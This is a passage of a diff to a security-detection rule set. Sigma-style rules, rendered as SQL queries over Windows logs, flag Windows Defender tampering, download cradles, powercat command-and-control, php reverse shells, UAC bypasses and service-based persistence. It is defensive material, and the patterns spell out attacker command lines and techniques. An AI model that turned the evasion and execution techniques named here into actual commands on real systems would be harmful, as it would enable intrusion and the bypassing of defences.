'%DisableRealtimeMonitoring 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableBehaviorMonitoring 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableScriptScanning 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableArchiveScanning 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableBlockAtFirstSeen 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableIOAVProtection 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableIntrusionPreventionSystem 
1%' ESCAPE '\\' OR HostApplication LIKE '%DisableRemovableDriveScanning 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableScanningMappedNetworkDrivesForFullScan 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableScanningNetworkFiles 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableRealtimeMonitoring $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableBehaviorMonitoring $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableScriptScanning $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableArchiveScanning $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableBlockAtFirstSeen $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableIOAVProtection $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableIntrusionPreventionSystem $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableRemovableDriveScanning $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableScanningMappedNetworkDrivesForFullScan $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableScanningNetworkFiles $true%' ESCAPE '\\')) OR ((HostApplication LIKE '%Set-MpPreference%' ESCAPE '\\' AND HostApplication LIKE '%Allow%' ESCAPE '\\' AND (HostApplication LIKE '%LowThreatDefaultAction%' ESCAPE '\\' OR HostApplication LIKE '%ModerateThreatDefaultAction%' ESCAPE '\\' OR HostApplication LIKE '%HighThreatDefaultAction%' ESCAPE '\\')) OR (HostApplication LIKE '%ltdefac %' ESCAPE '\\' OR HostApplication LIKE '%mtdefac %' ESCAPE '\\' OR HostApplication LIKE '%htdefac %' ESCAPE '\\' OR HostApplication LIKE '%stdefac %' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%C:\\\\Windows \\\\System32\\\\%' ESCAPE '\\')" ], - "filename": "posh_pc_tamper_with_windows_defender.yml" + "filename": "proc_creation_win_uac_bypass_trustedpath.yml" }, { - "title": "Zip A Folder With PowerShell For Staging In Temp - PowerShell", - "id": "71ff406e-b633-4989-96ec-bc49d825a412", + "title": "OpenWith.exe Executes Specified Binary", + "id": "cec8e918-30f7-4e2d-9bfa-a59cc97ae60f", "status": 
"test", - "description": "Use living off the land tools to zip a file and stage it in the Windows temporary folder for later exfiltration", - "author": "frack113", + "description": "The OpenWith.exe executes other binary", + "author": "Beyu Denis, oscd.community (rule), @harr0ey (idea)", "tags": [ - "attack.collection", - "attack.t1074.001" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Windows PowerShell' AND HostApplication LIKE '%Compress-Archive %' ESCAPE '\\' AND HostApplication LIKE '% -Path %' ESCAPE '\\' AND HostApplication LIKE '% -DestinationPath %' ESCAPE '\\' AND HostApplication LIKE '%$env:TEMP\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\OpenWith.exe' ESCAPE '\\' AND CommandLine LIKE '%/c%' ESCAPE '\\')" ], - "filename": "posh_pc_susp_zip_compress.yml" + "filename": "proc_creation_win_lolbin_openwith.yml" }, { - "title": "Suspicious Non PowerShell WSMAN COM Provider", - "id": "df9a0e0e-fedb-4d6c-8668-d765dfc92aa7", - "status": "test", - "description": "Detects suspicious use of the WSMAN provider without PowerShell.exe as the host application.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "title": "User Discovery And Export Via Get-ADUser Cmdlet", + "id": "1114e048-b69c-4f41-bc20-657245ae6e3f", + "status": "experimental", + "description": "Detects usage of the Get-ADUser cmdlet to collect user information and output it to a file", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.lateral_movement", - "attack.t1021.003" + "attack.discovery", + "attack.t1033" ], "falsepositives": [ - "Unknown" + "Legitimate admin scripts may use the same technique, it's better to exclude specific computers or users who execute these commands or scripts often" ], "level": 
"medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Windows PowerShell' AND ProviderName = 'WSMan' AND NOT (HostApplication LIKE '%powershell%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%Get-ADUser %' ESCAPE '\\' AND CommandLine LIKE '% -Filter \\*' ESCAPE '\\' AND (CommandLine LIKE '% > %' ESCAPE '\\' OR CommandLine LIKE '% | Select %' ESCAPE '\\' OR CommandLine LIKE '%Out-File%' ESCAPE '\\' OR CommandLine LIKE '%Set-Content%' ESCAPE '\\' OR CommandLine LIKE '%Add-Content%' ESCAPE '\\')))" ], - "filename": "posh_pc_wsman_com_provider_no_powershell.yml" + "filename": "proc_creation_win_powershell_user_discovery_get_aduser.yml" }, { - "title": "Abusable Invoke-ATHRemoteFXvGPUDisablementCommand - PowerShell", - "id": "f65e22f9-819e-4f96-9c7b-498364ae7a25", + "title": "New Network Trace Capture Started Via Netsh.EXE", + "id": "d3c3861d-c504-4c77-ba55-224ba82d0118", "status": "test", - "description": "RemoteFXvGPUDisablement.exe is an abusable, signed PowerShell host executable that was introduced in Windows 10 and Server 2019 (OS Build 17763.1339).", - "author": "frack113", + "description": "Detects the execution of netsh with the \"trace\" flag in order to start a network capture", + "author": "Kutepov Anton, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.discovery", + "attack.credential_access", + "attack.t1040" ], "falsepositives": [ - "Unknown" + "Legitimate administration activity" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Windows PowerShell' AND HostApplication LIKE '%Invoke-ATHRemoteFXvGPUDisablementCommand %' ESCAPE '\\' AND (HostApplication LIKE '%-ModuleName %' ESCAPE '\\' OR HostApplication LIKE '%-ModulePath %' ESCAPE '\\' OR HostApplication LIKE 
'%-ScriptBlock %' ESCAPE '\\' OR HostApplication LIKE '%-RemoteFXvGPUDisablementFilePath%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND (CommandLine LIKE '%trace%' ESCAPE '\\' AND CommandLine LIKE '%start%' ESCAPE '\\'))" ], - "filename": "posh_pc_susp_athremotefxvgpudisablementcommand.yml" + "filename": "proc_creation_win_netsh_packet_capture.yml" }, { - "title": "Alternate PowerShell Hosts", - "id": "d7326048-328b-4d5e-98af-86e84b17c765", - "status": "test", - "description": "Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "title": "Php Inline Command Execution", + "id": "d81871ef-5738-47ab-9797-7a9c90cd4bfb", + "status": "experimental", + "description": "Detects execution of php using the \"-r\" flag. This is could be used as a way to launch a reverse shell or execute live php code.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1059.001" + "attack.t1059" ], "falsepositives": [ - "Programs using PowerShell directly without invocation of a dedicated interpreter", - "MSP Detection Searcher", - "Citrix ConfigSync.ps1" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '400' AND Channel = 'Windows PowerShell') AND HostApplication LIKE '%' ESCAPE '\\' AND NOT (HostApplication LIKE 'C:\\\\WINDOWS\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe%' ESCAPE '\\' OR ContextInfo LIKE '%Citrix\\\\ConfigSync\\\\ConfigSync.ps1%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\php.exe' ESCAPE '\\' OR OriginalFileName = 'php.exe') AND CommandLine LIKE '% -r%' ESCAPE '\\')" ], - "filename": "posh_pc_alternate_powershell_hosts.yml" + "filename": 
"proc_creation_win_php_inline_command_execution.yml" }, { - "title": "PowerShell Downgrade Attack - PowerShell", - "id": "6331d09b-4785-4c13-980f-f96661356249", - "status": "experimental", - "description": "Detects PowerShell downgrade attack by comparing the host versions with the actually used engine version 2.0", - "author": "Florian Roth (Nextron Systems), Lee Holmes (idea), Harish Segar (improvements)", + "title": "UAC Bypass Using Disk Cleanup", + "id": "b697e69c-746f-4a86-9f59-7bfff8eab881", + "status": "test", + "description": "Detects the pattern of UAC Bypass using scheduled tasks and variable expansion of cleanmgr.exe (UACMe 34)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.execution", - "attack.t1059.001" + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '400' AND Channel = 'Windows PowerShell') AND EngineVersion LIKE '2.%' ESCAPE '\\' AND NOT (HostVersion LIKE '2.%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\"\\\\system32\\\\cleanmgr.exe /autoclean /d C:' ESCAPE '\\' AND ParentCommandLine LIKE 'C:\\\\Windows\\\\system32\\\\svchost.exe -k netsvcs -p -s Schedule' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" ], - "filename": "posh_pc_downgrade_attack.yml" + "filename": "proc_creation_win_uac_bypass_cleanmgr.yml" }, { - "title": "Nslookup PowerShell Download Cradle", - "id": "999bff6d-dc15-44c9-9f5c-e1051bfc86e1", + "title": "Windows Update Client LOLBIN", + "id": "d7825193-b70a-48a4-b992-8b5b3015cc11", "status": "experimental", - "description": "Detects suspicious powershell download cradle using nslookup. 
This cradle uses nslookup to extract payloads from DNS records", - "author": "Sai Prashanth Pulisetti @pulisettis, Aishwarya Singam", + "description": "Detects code execution via the Windows Update client (wuauclt)", + "author": "FPT.EagleEye Team", "tags": [ + "attack.command_and_control", "attack.execution", - "attack.t1059.001" + "attack.t1105", + "attack.t1218" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '400' AND Channel = 'Windows PowerShell' AND HostApplication LIKE '%powershell%' ESCAPE '\\' AND HostApplication LIKE '%nslookup%' ESCAPE '\\' AND (HostApplication LIKE '%-q=txt%' ESCAPE '\\' OR HostApplication LIKE '%-querytype=txt%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\wuauclt.exe' ESCAPE '\\' OR OriginalFileName = 'wuauclt.exe') AND (CommandLine LIKE '%/UpdateDeploymentProvider%' ESCAPE '\\' AND CommandLine LIKE '%/RunHandlerComServer%' ESCAPE '\\' AND CommandLine LIKE '%.dll%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '% /ClassId %' ESCAPE '\\' OR CommandLine LIKE '% wuaueng.dll %' ESCAPE '\\')))" ], - "filename": "posh_pc_abuse_nslookup_with_dns_records.yml" + "filename": "proc_creation_win_wuauclt_execution.yml" }, { - "title": "Netcat The Powershell Version", - "id": "c5b20776-639a-49bf-94c7-84f912b91c15", - "status": "test", - "description": "Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network", + "title": "Potential COM Objects Download Cradles Usage - Process Creation", + "id": "02b64f1b-3f33-4e67-aede-ef3b0a5a8fcf", + "status": "experimental", + "description": "Detects usage of COM objects that can be abused to download files in PowerShell by CLSID", "author": "frack113", - "tags": [ - "attack.command_and_control", - "attack.t1095" - ], "falsepositives": [ - "Unknown" + "Legitimate use of the library" ], 
"level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '400' AND Channel = 'Windows PowerShell' AND (HostApplication LIKE '%powercat %' ESCAPE '\\' OR HostApplication LIKE '%powercat.ps1%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%[Type]::GetTypeFromCLSID(%' ESCAPE '\\' AND (CommandLine LIKE '%0002DF01-0000-0000-C000-000000000046%' ESCAPE '\\' OR CommandLine LIKE '%F6D90F16-9C73-11D3-B32E-00C04F990BB4%' ESCAPE '\\' OR CommandLine LIKE '%F5078F35-C551-11D3-89B9-0000F81FE221%' ESCAPE '\\' OR CommandLine LIKE '%88d96a0a-f192-11d4-a65f-0040963251e5%' ESCAPE '\\' OR CommandLine LIKE '%AFBA6B42-5692-48EA-8141-DC517DCF0EF1%' ESCAPE '\\' OR CommandLine LIKE '%AFB40FFD-B609-40A3-9828-F88BBE11E4E3%' ESCAPE '\\' OR CommandLine LIKE '%88d96a0b-f192-11d4-a65f-0040963251e5%' ESCAPE '\\' OR CommandLine LIKE '%2087c2f4-2cef-4953-a8ab-66779b670495%' ESCAPE '\\' OR CommandLine LIKE '%000209FF-0000-0000-C000-000000000046%' ESCAPE '\\' OR CommandLine LIKE '%00024500-0000-0000-C000-000000000046%' ESCAPE '\\'))" ], - "filename": "posh_pc_powercat.yml" + "filename": "proc_creation_win_powershell_download_com_cradles.yml" }, { - "title": "Abusable Invoke-ATHRemoteFXvGPUDisablementCommand - PowerShell Module", - "id": "38a7625e-b2cb-485d-b83d-aff137d859f4", + "title": "Use of Pcalua For Execution", + "id": "0955e4e1-c281-4fb9-9ee1-5ee7b4b754d2", "status": "experimental", - "description": "RemoteFXvGPUDisablement.exe is an abusable, signed PowerShell host executable that was introduced in Windows 10 and Server 2019 (OS Build 17763.1339).", - "author": "frack113", + "description": "Detects execition of commands and binaries from the context of The program compatibility assistant (Pcalua.exe). This can be used as a LOLBIN in order to bypass application whitelisting.", + "author": "Nasreddine Bencherchali (Nextron Systems), E.M. 
Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.execution", + "attack.t1059" ], "falsepositives": [ - "Unknown" + "Legitimate use by a via a batch script or by an administrator." ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ContextInfo LIKE '%Invoke-ATHRemoteFXvGPUDisablementCommand %' ESCAPE '\\' AND (ContextInfo LIKE '%-ModuleName %' ESCAPE '\\' OR ContextInfo LIKE '%-ModulePath %' ESCAPE '\\' OR ContextInfo LIKE '%-ScriptBlock %' ESCAPE '\\' OR ContextInfo LIKE '%-RemoteFXvGPUDisablementFilePath%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\pcalua.exe' ESCAPE '\\' AND CommandLine LIKE '% -a%' ESCAPE '\\')" ], - "filename": "posh_pm_susp_athremotefxvgpudisablementcommand.yml" + "filename": "proc_creation_win_lolbin_pcalua.yml" }, { - "title": "Suspicious PowerShell Invocations - Generic - PowerShell Module", - "id": "bbb80e91-5746-4fbe-8898-122e2cafdbf4", - "status": "experimental", - "description": "Detects suspicious PowerShell invocation command parameters", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious HH.EXE Execution", + "id": "e8a95b5e-c891-46e2-b33a-93937d3abc31", + "status": "test", + "description": "Detects a suspicious execution of a Microsoft HTML Help (HH.exe)", + "author": "Maxim Pavlunin", "tags": [ + "attack.defense_evasion", "attack.execution", - "attack.t1059.001" + "attack.initial_access", + "attack.t1047", + "attack.t1059.001", + "attack.t1059.003", + "attack.t1059.005", + "attack.t1059.007", + "attack.t1218", + "attack.t1218.001", + "attack.t1218.010", + "attack.t1218.011", + "attack.t1566", + "attack.t1566.001" ], "falsepositives": [ - "Very special / sneaky PowerShell scripts" + "Unknown" ], "level": "high", "rule": [ - "SELECT * 
FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ContextInfo LIKE '% -enc %' ESCAPE '\\' OR ContextInfo LIKE '% -EncodedCommand %' ESCAPE '\\' OR ContextInfo LIKE '% -ec %' ESCAPE '\\') AND (ContextInfo LIKE '% -w hidden %' ESCAPE '\\' OR ContextInfo LIKE '% -window hidden %' ESCAPE '\\' OR ContextInfo LIKE '% -windowstyle hidden %' ESCAPE '\\' OR ContextInfo LIKE '% -w 1 %' ESCAPE '\\') AND (ContextInfo LIKE '% -noni %' ESCAPE '\\' OR ContextInfo LIKE '% -noninteractive %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'HH.exe' OR NewProcessName LIKE '%\\\\hh.exe' ESCAPE '\\') AND (CommandLine LIKE '%.application%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Content.Outlook\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))" ], - "filename": "posh_pm_susp_invocation_generic.yml" + "filename": "proc_creation_win_hh_susp_execution.yml" }, { - "title": "Invoke-Obfuscation Via Use MSHTA - PowerShell Module", - "id": "07ad2ea8-6a55-4ac6-bf3e-91b8e59676eb", + "title": "PUA - Potential PE Metadata Tamper Using Rcedit", + "id": "0c92f2e6-f08f-4b73-9216-ecb0ca634689", "status": "experimental", - "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", - "author": "Nikita Nazarov, oscd.community", + "description": "Detects the use of rcedit to potentially alter executable PE metadata properties, which could conceal efforts to rename system utilities for defense evasion.", + "author": "Micah Babinski", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.t1036.003", + "attack.t1036", + "attack.t1027.005", + "attack.t1027" ], "falsepositives": [ - "Unknown" + 
"Legitimate use of the tool by administrators or users to update metadata of a binary" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload LIKE '%set%' ESCAPE '\\' AND Payload LIKE '%&&%' ESCAPE '\\' AND Payload LIKE '%mshta%' ESCAPE '\\' AND Payload LIKE '%vbscript:createobject%' ESCAPE '\\' AND Payload LIKE '%.run%' ESCAPE '\\' AND Payload LIKE '%(window.close)%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\rcedit-x64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rcedit-x86.exe' ESCAPE '\\') OR Description = 'Edit resources of exe' OR Product = 'rcedit') AND CommandLine LIKE '%--set-%' ESCAPE '\\' AND (CommandLine LIKE '%OriginalFileName%' ESCAPE '\\' OR CommandLine LIKE '%CompanyName%' ESCAPE '\\' OR CommandLine LIKE '%FileDescription%' ESCAPE '\\' OR CommandLine LIKE '%ProductName%' ESCAPE '\\' OR CommandLine LIKE '%ProductVersion%' ESCAPE '\\' OR CommandLine LIKE '%LegalCopyright%' ESCAPE '\\'))" ], - "filename": "posh_pm_invoke_obfuscation_via_use_mhsta.yml" + "filename": "proc_creation_win_pua_rcedit_execution.yml" }, { - "title": "SyncAppvPublishingServer Bypass Powershell Restriction - PS Module", - "id": "fe5ce7eb-dad8-467c-84a9-31ec23bd644a", + "title": "HackTool - Jlaive In-Memory Assembly Execution", + "id": "0a99eb3e-1617-41bd-b095-13dc767f3def", "status": "experimental", - "description": "Detects SyncAppvPublishingServer process execution which usually utilized by adversaries to bypass PowerShell execution restrictions.", - "author": "Ensar Şamil, @sblmsrsn, OSCD Community", + "description": "Detects the use of Jlaive to execute assemblies in a copied PowerShell", + "author": "Jose Luis Sanchez Martinez (@Joseliyo_Jstnk)", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.execution", + "attack.t1059.003" ], 
"falsepositives": [ - "App-V clients" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ContextInfo LIKE '%SyncAppvPublishingServer.exe%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%.bat' ESCAPE '\\') AND ((NewProcessName LIKE '%\\\\xcopy.exe' ESCAPE '\\' AND CommandLine LIKE '%powershell.exe%' ESCAPE '\\' AND CommandLine LIKE '%.bat.exe%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\xcopy.exe' ESCAPE '\\' AND CommandLine LIKE '%pwsh.exe%' ESCAPE '\\' AND CommandLine LIKE '%.bat.exe%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\attrib.exe' ESCAPE '\\' AND CommandLine LIKE '%+s%' ESCAPE '\\' AND CommandLine LIKE '%+h%' ESCAPE '\\' AND CommandLine LIKE '%.bat.exe%' ESCAPE '\\')))" ], - "filename": "posh_pm_syncappvpublishingserver_exe.yml" + "filename": "proc_creation_win_hktl_jlaive_batch_execution.yml" }, { - "title": "Invoke-Obfuscation RUNDLL LAUNCHER - PowerShell Module", - "id": "a23791fe-8846-485a-b16b-ca691e1b03d4", + "title": "Suspicious Msiexec Execute Arbitrary DLL", + "id": "6f4191bb-912b-48a8-9ce7-682769541e6d", "status": "experimental", - "description": "Detects Obfuscated Powershell via RUNDLL LAUNCHER", - "author": "Timur Zinniatullin, oscd.community", + "description": "Adversaries may abuse msiexec.exe to proxy execution of malicious payloads.\nMsiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi)\n", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.t1218.007" ], "falsepositives": [ - "Unknown" + "Legitimate script" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN 
('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload LIKE '%rundll32.exe%' ESCAPE '\\' AND Payload LIKE '%shell32.dll%' ESCAPE '\\' AND Payload LIKE '%shellexec\\_rundll%' ESCAPE '\\' AND Payload LIKE '%powershell%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' AND (CommandLine LIKE '% /y%' ESCAPE '\\' OR CommandLine LIKE '% -y%' ESCAPE '\\')) AND NOT (((CommandLine LIKE '%\\\\MsiExec.exe\" /Y \"C:\\\\Program Files\\\\Bonjour\\\\mdnsNSP.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsiExec.exe\" /Y \"C:\\\\Program Files (x86)\\\\Bonjour\\\\mdnsNSP.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsiExec.exe\" /Y \"C:\\\\Program Files (x86)\\\\Apple Software Update\\\\ScriptingObjectModel.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsiExec.exe\" /Y \"C:\\\\Program Files (x86)\\\\Apple Software Update\\\\SoftwareUpdateAdmin.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsiExec.exe\" /Y \"C:\\\\Windows\\\\CCM\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsiExec.exe\" /Y C:\\\\Windows\\\\CCM\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsiExec.exe\" -Y \"C:\\\\Program Files\\\\Bonjour\\\\mdnsNSP.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsiExec.exe\" -Y \"C:\\\\Program Files (x86)\\\\Bonjour\\\\mdnsNSP.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsiExec.exe\" -Y \"C:\\\\Program Files (x86)\\\\Apple Software Update\\\\ScriptingObjectModel.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsiExec.exe\" -Y \"C:\\\\Program Files (x86)\\\\Apple Software Update\\\\SoftwareUpdateAdmin.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsiExec.exe\" -Y \"C:\\\\Windows\\\\CCM\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsiExec.exe\" -Y C:\\\\Windows\\\\CCM\\\\%' ESCAPE '\\'))))" ], - "filename": "posh_pm_invoke_obfuscation_via_rundll.yml" + "filename": "proc_creation_win_msiexec_execute_dll.yml" }, { - "title": "Invoke-Obfuscation COMPRESS OBFUSCATION - PowerShell 
Module", - "id": "7034cbbb-cc55-4dc2-8dad-36c0b942e8f1", - "status": "experimental", - "description": "Detects Obfuscated Powershell via COMPRESS OBFUSCATION", - "author": "Timur Zinniatullin, oscd.community", + "title": "UAC Bypass Using IEInstal - Process", + "id": "80fc36aa-945e-4181-89f2-2f907ab6775d", + "status": "test", + "description": "Detects the pattern of UAC Bypass using IEInstal.exe (UACMe 64)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload LIKE '%new-object%' ESCAPE '\\' AND Payload LIKE '%text.encoding]::ascii%' ESCAPE '\\' AND (Payload LIKE '%system.io.compression.deflatestream%' ESCAPE '\\' OR Payload LIKE '%system.io.streamreader%' ESCAPE '\\') AND Payload LIKE '%readtoend' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND IntegrityLevel IN ('High', 'System') AND ParentProcessName LIKE '%\\\\ieinstal.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%consent.exe' ESCAPE '\\')" ], - "filename": "posh_pm_invoke_obfuscation_via_compress.yml" + "filename": "proc_creation_win_uac_bypass_ieinstal.yml" }, { - "title": "Malicious PowerShell Commandlets - PoshModule", - "id": "7d0d0329-0ef1-4e84-a9f5-49500f9d7c6c", + "title": "Potential Persistence Attempt Via Existing Service Tampering", + "id": "38879043-7e1e-47a9-8d46-6bec88e201df", "status": "test", - "description": "Detects Commandlet names from well-known PowerShell exploitation frameworks", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the modification of an existing service in 
order to execute an arbitrary payload when the service is started or killed as a potential method for persistence.", + "author": "Sreeman", "tags": [ - "attack.execution", - "attack.discovery", - "attack.t1482", - "attack.t1087", - "attack.t1087.001", - "attack.t1087.002", - "attack.t1069.001", - "attack.t1069.002", - "attack.t1069", - "attack.t1059.001" + "attack.persistence", + "attack.t1543.003", + "attack.t1574.011" + ], + "falsepositives": [ + "Unknown" + ], + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((CommandLine LIKE '%sc %' ESCAPE '\\' AND CommandLine LIKE '%config %' ESCAPE '\\' AND CommandLine LIKE '%binpath=%' ESCAPE '\\') OR (CommandLine LIKE '%sc %' ESCAPE '\\' AND CommandLine LIKE '%failure%' ESCAPE '\\' AND CommandLine LIKE '%command=%' ESCAPE '\\')) OR (((CommandLine LIKE '%reg %' ESCAPE '\\' AND CommandLine LIKE '%add %' ESCAPE '\\' AND CommandLine LIKE '%FailureCommand%' ESCAPE '\\') OR (CommandLine LIKE '%reg %' ESCAPE '\\' AND CommandLine LIKE '%add %' ESCAPE '\\' AND CommandLine LIKE '%ImagePath%' ESCAPE '\\')) AND (CommandLine LIKE '%.sh%' ESCAPE '\\' OR CommandLine LIKE '%.exe%' ESCAPE '\\' OR CommandLine LIKE '%.dll%' ESCAPE '\\' OR CommandLine LIKE '%.bin$%' ESCAPE '\\' OR CommandLine LIKE '%.bat%' ESCAPE '\\' OR CommandLine LIKE '%.cmd%' ESCAPE '\\' OR CommandLine LIKE '%.js%' ESCAPE '\\' OR CommandLine LIKE '%.msh$%' ESCAPE '\\' OR CommandLine LIKE '%.reg$%' ESCAPE '\\' OR CommandLine LIKE '%.scr%' ESCAPE '\\' OR CommandLine LIKE '%.ps%' ESCAPE '\\' OR CommandLine LIKE '%.vb%' ESCAPE '\\' OR CommandLine LIKE '%.jar%' ESCAPE '\\' OR CommandLine LIKE '%.pl%' ESCAPE '\\'))))" + ], + "filename": "proc_creation_win_sc_service_tamper_for_persistence.yml" + }, + { + "title": "Copy .DMP/.DUMP Files From Remote Share Via Cmd.EXE", + "id": "044ba588-dff4-4918-9808-3f95e8160606", + "status": "experimental", + "description": "Detects usage of the copy builtin cmd command to copy 
